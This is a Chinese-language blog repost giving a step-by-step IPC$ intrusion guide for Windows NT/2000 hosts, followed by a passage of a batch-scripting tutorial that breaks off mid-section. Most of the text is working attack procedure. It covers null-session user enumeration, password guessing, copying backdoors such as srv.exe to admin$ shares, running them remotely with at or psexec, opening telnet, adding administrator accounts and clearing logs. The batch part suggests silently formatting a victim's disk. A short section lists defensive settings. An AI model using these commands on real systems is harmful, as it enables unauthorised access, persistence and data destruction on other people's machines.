一份详尽的IPC$入侵资料

252 篇文章 0 订阅

一份详尽的IPC$入侵资料

经过整理手头的资料而成,并非原创,不过带着汗水,往转贴时注明出处

http://blog.csdn.net/clin003/

IPC入侵命令大全


一 摘要
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 关于at命令和xp对ipc$的限制
十 如何打开目标的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能会用到的命令
十三 对比过去和现今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵问答精选

一 摘要
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论

之列。


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信

而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并

以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新

功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提

供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享

(c$,d$,e$……)和系统目录 winnt或windows(admin$)共享。所有的这些,微软的初衷都

是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏

洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null

session)。那么什么是空会话呢?


三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话

将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核

实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;

如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为

正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上

的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据

WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程

中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能

让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID (它标识

了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的

SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不

能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。

那么建立空会话到底可以作什么呢?


四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问

everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用

更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问

到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来

看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口

令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了

猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用

处的说法是不正确的。以下是空会话中能够使用的一些具体命令:


1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use //ip/ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各

一个空格。


2 查看远程主机的共享资源
命令:net view //ip
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共

享,可以得到如下面的结果,但此命令不能显示默认共享。

在 //*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令: net time //ip
解释:用此命令可以得到一个远程主机的当前时间。


4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37


以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:

建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下

面我们就来看看ipc$所使用的端口是什么?


五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于

TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除

了基于NBT实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果

445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口

无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端

口无响应,那么会话失败。


对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有

监听139或445端口,ipc$会话是无法建立的。


六 ipc管道在hack攻击中的意义
ipc 管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc

管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过

工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传

送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手

段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大

呼救命。当然,我们也不能忽视权限在ipc 管道中扮演的重要角色,想必你一定品尝过

空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权

限,那么ipc管道这把双刃剑将显示出它狰狞的一面。


七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:

1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多

DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互

建立ipc$连接,98/me是不能建立ipc$连接的;


2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这

样,如果响应方关闭了ipc$共享,将不能建立连接;


3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络

链结和通讯,没有它发起方无法发起连接请求;


4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、

打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求

,不过没有它仍可发起ipc$连接;


5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这

种情况好像不多);


6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;


7 连接发起方未打开139,445端口;


8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样

的错误提示(显然空会话排除这种错误);


9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号

可以省略,如果密码为空,可以直接输入两个引号""即可;


10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要

重新建立连接。


另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动

;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删

除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。


八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制

成功,那么导致复制失败的常见原因又有哪些呢?


1 对方未开启共享文件夹
这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对

方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议

大家在进行复制之前务必用net view //IP这个命令看一下你想要复制的共享文件夹是否

存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文件夹存在。


2 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马

上向c$,d$,admin $之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失

败。ipc$连接成功只能说明对方打开了ipc$共享,并不能说明默认共享一定存在。 ipc$

共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默

认共享却是实实在在的共享文件夹;

2)由于 net view //IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此

通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共

享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的

同时,都能扫到默认共享目录,可以避免此类错误的发生)

要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管

道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们

自己开启的可以设置权限的共享文件夹。


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;
2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators

组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录


3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

注意:
1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的
2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理

员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为

仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,

你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共享,那么你却

可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。


4被防火墙杀死或在局域网
还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了

,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接

的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,

但实际你的复制操作已经成功了,只是运行时出了问题。


呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结

的只是一些常见错误,没说到的,大家可以给我提个醒儿。


九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也

很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用 psexec.exe远

程运行程序,假设想要远程机器执行本地c:/xinxin.exe文件,且管理员为

administrator,密码为1234,那么输入下面的命令:
psexec //ip -u administrator -p 1234 -c c:/xinxin.exe
如果已经建立ipc连接,则-u -p这两个参数不需要,psexec.exe将自动拷贝文件到远程

机器并运行。

本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切

的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp

的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户

和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且

到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密

码,我建议你尽量避开ipc管道。


十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell

,比如telnet,木马,cmd重定向等,然后在shell下执行:
net share ipc$
开放目标的ipc$共享;
net share ipc$ /del
关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:/
这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开

共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)

。再次声明,这些操作都是在shell下才能实现的。


十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$

连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完

成;

2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill

)。


十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些

命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如

果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程

主机执行。


1 建立/删除ipc$连接的命令

1)建立空连接:
net use //127.0.0.1/ipc$ "" /user:""

2)建立非空连接:
net use //127.0.0.1/ipc$ "密码" /user:"用户名"

3)删除连接:
net use //127.0.0.1/ipc$ /del


2 在ipc$连接中对远程主机的操作命令

1) 查看远程主机的共享资源(看不到默认共享):
net view //127.0.0.1

2) 查看远程主机的当前时间:
net time //127.0.0.1

3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4)映射/删除远程共享:
net use z: //127.0.0.1/c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘,其他盘类推

5)向远程主机复制文件:
copy 路径/文件名 //IP/共享目录名,如:
copy c:/xinxin.exe //127.0.0.1/c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy //127.0.0.1/c$/xinxin.exe c:/

6)远程添加计划任务:
at //IP 时间 程序名 如:
at //127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如

system32/)下则不用加路径,否则必须加全路径


3 本地命令

1)查看本地主机的共享资源(可以看到本地的默认共享)
net share

2)得到本地主机的用户列表
net user

3)显示本地某用户的帐户信息
net user 帐户名

4)显示本地主机当前启动的服务
net start

5)启动/关闭本地服务
net start 服务名
net stop 服务名

6)在本地添加帐户
net user 帐户名 密码 /add

7)激活禁用的用户
net uesr 帐户名 /active:yes

8)加入管理员组
net localgroup administrators 帐户名 /add

很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你

telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。


4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23

2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe //ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe //127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效

3)用psexec.exe一步获得shell,需要ipc管道支持
psexec.exe //IP -u 管理员帐号 -p 密码 cmd
psexec.exe //127.0.0.1 -u administrator -p "" cmd


十三 对比过去和现今的ipc$入侵
既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:

[1]
C:/>net use //127.0.0.1/ipc$ "" /user:admintitrators
//用扫到的空口令建立连接  

[2]
c:/>net view //127.0.0.1
//查看远程的共享资源

[3]
C:/>copy srv.exe //127.0.0.1/admin$/system32
//将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启  

[4]
C:/>net time //127.0.0.1
//查看远程主机的当前时间

[5]
C:/>at //127.0.0.1 时间 srv.exe
//用at命令远程运行srv.exe,需要对方开启了'Task Scheduler'服务  

[6]
C:/>net time //127.0.0.1
//再次查看当前时间来估算srv.exe是否已经运行,此步可以省略

[7]    
C:/>telnet 127.0.0.1 99
//开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么

意思?那你就把它想象成远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的

一次性后门的端口  

[8]
C:/WINNT/system32>net start telnet
//我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后

门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略

[9]
C:/>copy ntlm.exe //127.0.0.1/admin$/system32
//在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的  

[10]
C:/WINNT/system32>ntlm.exe
//在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了
  
[11]
C:/>telnet 127.0.0.1 23
//在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门

[12]
C:/WINNT/system32>net user 帐户名 密码 /add
C:/WINNT/system32>net uesr guest /active:yes
C:/WINNT/system32>net localgroup administrators 帐户名 /add
//telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等

好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工

具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高

效而简单的ipc$入侵吧。

[1]
psexec.exe //IP -u 管理员帐号 -p 密码 cmd
//用这个工具我们可以一步到位的获得shell

OpenTelnet.exe //server 管理员帐号 密码 NTLM的认证方式 port
//用它可以方便的更改telnet的验证方式和端口,方便我们登陆

[2]
已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell

,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你

选了,我就不多说了。


十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

运行regedit,找到如下主键

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous

= DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但无法通过这种连接得到列举

SAM帐号和共享信息的权限;在Windows 2000 中增加了"2",未取得匿名权的用户将不能

进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如

果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略

-安全选项-'对匿名连接的额外限制'


2 禁止默认共享

1)察看本地共享资源
运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此操作并不能关闭ipc$共享)
运行-regedit

server 版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/

CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer (DWORD

)的键值改为:00000000。

pro版:找到如下主键

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters

]把AutoShareWks(DWORD)的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使

设置生效。


3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享,那就禁止server服务吧:
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这

时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于server

服务,不要管它。


4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻

止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System/Controlset/Services/NetBT/Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。

3)安装防火墙进行端口过滤


6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识

,比不停的打补丁要安全的多。


十五 ipc$入侵问答精选
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?

答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。


2.你看下面的情况是为什么,可以连接但不能复制
net use //***.***.***.***/ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe //***.***.***.***/admin$
找不到网络路径
命令不成功

答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的

共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件

夹。


3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连

接没有太多的权限,但没别的办法了吗?

答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃

,毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view //ip发现它没开

默认共享,我该怎么办?

答:首先纠正你的一个错误,用net view //ip是无法看到默认共享的,你可以试着将文

件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe

或psexec.exe吧,用法上面有。


5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器

上,这是怎么回事?
net uset ccbirds /add

答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell

,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你

的操作只是在本地进行。


6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的

机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开

,我该怎么办?

答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种

可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允

许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。


7.我用Win98能与对方建立ipc$连接吗?

答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不

必要的麻烦。


8.我用net use //ip/ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP

却无法导出用户列表,这是为什么?

答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁

止导出列表,就会出现你所说的情况;还有可能是你自己的NBT没有打开,netstat命令

是建立在NBT之上的。  


9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么

回事?

答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连

接是不允许的。


10.我在映射的时候出现:
F:/>net use h: //211.161.134.*/e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?

答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!


11.我建立了一个连接f:/>net use //*.*.*.*/ipc$ "123" /user:"guest" 成功了,但

当我映射时出现了错误,向我要密码,怎么回事?
F:/>net use h: //*.*.*.*/c$
密码在 //*.*.*.*/c$ 无效。
请键入 //*.*.*.*/c$ 的密码:
系统发生 5 错误。
拒绝访问。

答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想

办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?

答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这

两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空

,而且可以连接,但不能复制东西,说错误5。请问为什么?

答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份

验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你

复制文件,当然是错误5:权限不够。


14.我用net use //192.168.0.2/ipc$ "password" /user:"administrator" 成功,可是

net use i: //192.168.0.2/c
出现请键入 //192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都

可以访问呀?

答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置

访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述

问题。


15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服

务呢?

答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。


16.能告诉我下面的两个错误产生的原因吗?
c:/>net time //61.225.*.*
系统发生 5 错误。
拒绝访问。

c:/>net view //61.225.*.*
系统发生 5 错误。
拒绝访问。

答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都

可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同

志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命

令,随之发生了错误5。


17.您看看这是怎么回事?
F:/>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答:答案很简单,你的命令错了,应该是net time //ip
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view //ip

 

 

---------------------------------------
简明批处理教程:


批处理命令如果运用得当,威力强大无人能敌!是不是想学习了呢,从今天我将把批处理

的常用命令陆续的介绍给大家,如果大家有什么不懂的地方,可以写下评论:


批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或

.cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用

Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前

回显设置。
语法
echo [{on off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> )结合来

实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。


2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不

能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微

软留了个autoset这个参数给我们,效果和/y是一样的。)


3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会

有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母

是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别

人看起来才会理解你的意图啊。


4.Rem 命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,

便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:/back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:/back中。显示的注释提示您

将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任

意键继续处理。


6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用

作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名


7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示

。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:

参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
